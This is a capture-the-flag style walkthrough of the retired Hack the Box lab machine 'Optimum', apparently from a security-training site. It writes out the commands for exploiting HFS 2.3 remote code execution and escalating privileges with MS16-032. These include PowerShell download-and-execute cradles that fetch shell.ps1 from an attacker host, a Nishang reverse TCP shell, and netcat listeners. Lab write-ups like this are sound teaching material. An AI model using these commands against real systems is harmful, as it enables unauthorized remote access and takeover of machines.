Hack the Box (HTB) machines walkthrough series – Optimum
Today we will be continuing with our Hack the Box (HTB) machine series. This article contains the walkthrough of another HTB machine, this one named “Optimum.”
HTB is an excellent platform that hosts machines belonging to multiple OSes. It offers multiple types of challenges as well. The individual can download the VPN pack to connect to the machines hosted on the HTB platform and has to solve the puzzle (simple enumeration plus pentest) in order to log into the platform.
FREE role-guided training plans
Note: Only writeups of retired HTB machines are allowed. The machine in this article, Optimum, is retired.
Walkthrough
Let’s start with this machine.
1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.
2. The Optimum machine IP is 10.10.10.8.
3. We will adopt the same methodology of performing penetration testing as we have used previously. Let’s start with enumeration in order to gain as much information on the machine as possible.
4. Below is the nmap scan output. As we can see, we have only port 80 open and the service exposed is HFS 2.3. [CLICK IMAGES TO ENLARGE]
<<nmap -sC -sV -oA optimum 10.10.10.8>>
5. For the HFS service there is a known exploit, listed here.
6. Let’s look into the exploit a bit more before running it. As we can see below, the remote code execution violation happens in the search parameter by appending %00 to the command.
7. In the exploit, the author has shown how to exploit the vulnerability, upload nc.exe from the attacking machine and get the shell back.
8. To help make it clear, below is the decoded format of that request.
9. The script also needs to be edited to include the attacking machine IP and port.
ip_addr=<attacking machine ip>
local_port=1234
10. After that, let’s copy Kali Linux shipped in Windows nc binary to our working directory.
<<cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum>>
11. And raise a Python http server to host it.
<<python -m simpleHTTPServer 80>>
12. Also set up a listener on port 1234 to get the shell back on the attacking machine.
<<nc -nlvp 1234>>
13. Execute the script like below.
<<Python 39161.py 10.10.10.8 80>>
14. We got the shell at user level.
15. Browse to get the user text flag.
<<cd ..>>
<<type user.txt.txt>>
16. Let’s start the enumeration process again to escalate the privileges to the admin/system level.
17. Let’s use a new and very useful utility known as windows-exploit-suggester.py (found here)
18. This tool works by evaluating the current system info with known KB articles and flag the CVEs for missing KBs.
- Let’s start by updating the database locally. <<python windows-exploit-suggester.py --update>>
- Then, on the system shell, generate the system profile with the systeminfo command. Copy that text as a file locally on the attacking box <<systeminfo>>
- Run the below command to evaluate the current system profile. <<python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls>>
19. We can see that there are several missing CVEs on this system. The one that we will target is MS16-032.
20. We can use Metasploit directly here, but we can also use PowerShell to escalate on this system as well.
21. Under PowerShell/Empire, there is a separate ps1 file for MS16-032. We will save it as Empire.ps1.
22. Opening this file, we can see that the usage is like below.
23. Adding the same to the end of the file:
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.2/shell.ps1')"
24. What is shell.ps1 above? Shell.ps1 is another PowerShell reverse TCP shell from Nishang repo. See below: Invoke-PowerShellTCP.ps1.C
25. On the victim system we will download the MS16-032 ps1 file, which will escalate the privileges and give the shell back through shell.ps1.
26. We need to change shell.ps1 and make it point back to our attacking system.
<<Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4321>>
27. Before we execute, let’s open the listener on our machine to listen for the shell.
<<nc -nlvp 4321>>
28. On the victim side, download Empire.ps1 with the below session, which will inherently download shell.ps1. We should get a shell back.
<< powershell IEX(New-Object Net.WebClient).downloadString(‘http://<attacking machine>/Empire.ps1’>>
29. But we did not get the session. I tried multiple times and even reverted the box, but it was not working. There were no tokens generated and hence no handles were captured.
30. After multiple tries, I discovered the issue. The system we are targeting is 64-bit and the user level shell that we have is 32-bit, because we uploaded the 32-bit nc.exe onto the system. So we need to access the 64-bit System32 folder, but instead we were routed to SysWOW64. To make sure we use the 64-bit System32 folder PowerShell binary, we need to use Sysnative, which will help redirect the request from a 32-bit application to System32 instead of SysWOW64.
31. Quickly testing this, I pulled a Burp suite session and sent the request to Repeater. Since we know that the parameter to exploit is search with %00, we followed the original exploit, except this time we use PowerShell instead of vbs. As you can see below, I have mentioned the Sysnative directory which should do the routing. Please note that this will give us a new user 64-bit session.
32. Open the listener and execute the payload. We get the session.
<<nc -nlvp 4321>>
33. Now just replicate the steps above with a new reverse shell file (newshell.ps1) to listen back on 4444.
34. Open the listener on 4444 this time and execute the payload, and we exploit the vuln and get the handle.
<<nc -nlvp 4444>>
35. Just navigate to the Administrator directory to get the root.txt.
<<type root.txt>>
This was really a fun box, as one needs to understand the exploit instead of blindly exploiting it and then must make sure that the escalation path goes in the correct 64-bit shell.
What should you learn next?
We will continue this series with more such interesting machines.
In this Series
- Hack the Box (HTB) machines walkthrough series – Optimum
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness